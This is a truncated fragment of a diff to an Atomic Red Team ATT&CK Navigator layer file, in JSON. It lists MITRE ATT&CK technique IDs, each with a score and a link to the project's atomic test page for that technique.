b/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"},{"techniqueID":"T1557.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"},{"techniqueID":"T1557","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1567","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1588.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"},{"techniqueID":"T1588","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"},{"techniqueID":"T1606.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"},{"techniqueID":"T1606","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View 